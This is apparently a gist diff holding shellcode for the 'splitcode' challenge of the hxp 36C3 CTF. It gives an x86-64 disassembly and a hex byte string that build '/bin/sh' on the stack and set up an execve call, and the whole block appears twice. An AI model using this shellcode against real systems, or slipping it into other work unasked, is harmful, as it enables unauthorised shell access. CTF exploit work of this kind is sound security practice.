aengelke · December 29, 2019 20:59
diff --git a/pwn-splitcode.txt b/pwn-splitcode.txt
 Deterministic splitcode exploit (hxp 36C3 CTF) by aengelke

 0:  b1 10                   mov    cl,0x10
 2:  31 c7                   xor    edi,eax
 4:  b3 24                   mov    bl,0x24
 6:  b7 3a                   mov    bh,0x3a
 8:  d3 cb                   ror    ebx,cl
 a:  b7 8d                   mov    bh,0x8d
 c:  31 df                   xor    edi,ebx
 e:  89 fc                   mov    esp,edi
 10: 58                      pop    rax
 11: 99                      cdq
 12: b0 68                   mov    al,0x68
 14: 66 50                   push   ax
 16: b7 73                   mov    bh,0x73
 18: b3 2f                   mov    bl,0x2f
 1a: 66 53                   push   bx
 1c: b5 6e                   mov    ch,0x6e
 1e: b1 69                   mov    cl,0x69
 20: 66 51                   push   cx
 22: b7 62                   mov    bh,0x62
 24: 66 53                   push   bx
 26: 5b                      pop    rbx
 27: 5e                      pop    rsi
 28: b0 3b                   mov    al,0x3b

 \xB1\x10\x31\xC7\xB3\x24\xB7\x3A\xD3\xCB\xB7\x8D\x31\xDF\x89\xFC\x58\x99\xB0\x68\x66\x50\xB7\x73\xB3\x2F\x66\x53\xB5\x6E\xB1\x69\x66\x51\xB7\x62\x66\x53\x5B\x5E\xB0\x3B
	Deterministic splitcode exploit (hxp 36C3 CTF) by aengelke

	0: b1 10 mov cl,0x10
	2: 31 c7 xor edi,eax
	4: b3 24 mov bl,0x24
	6: b7 3a mov bh,0x3a
	8: d3 cb ror ebx,cl
	a: b7 8d mov bh,0x8d
	c: 31 df xor edi,ebx
	e: 89 fc mov esp,edi
	10: 58 pop rax
	11: 99 cdq
	12: b0 68 mov al,0x68
	14: 66 50 push ax
	16: b7 73 mov bh,0x73
	18: b3 2f mov bl,0x2f
	1a: 66 53 push bx
	1c: b5 6e mov ch,0x6e
	1e: b1 69 mov cl,0x69
	20: 66 51 push cx
	22: b7 62 mov bh,0x62
	24: 66 53 push bx
	26: 5b pop rbx
	27: 5e pop rsi
	28: b0 3b mov al,0x3b

	\xB1\x10\x31\xC7\xB3\x24\xB7\x3A\xD3\xCB\xB7\x8D\x31\xDF\x89\xFC\x58\x99\xB0\x68\x66\x50\xB7\x73\xB3\x2F\x66\x53\xB5\x6E\xB1\x69\x66\x51\xB7\x62\x66\x53\x5B\x5E\xB0\x3B
No results found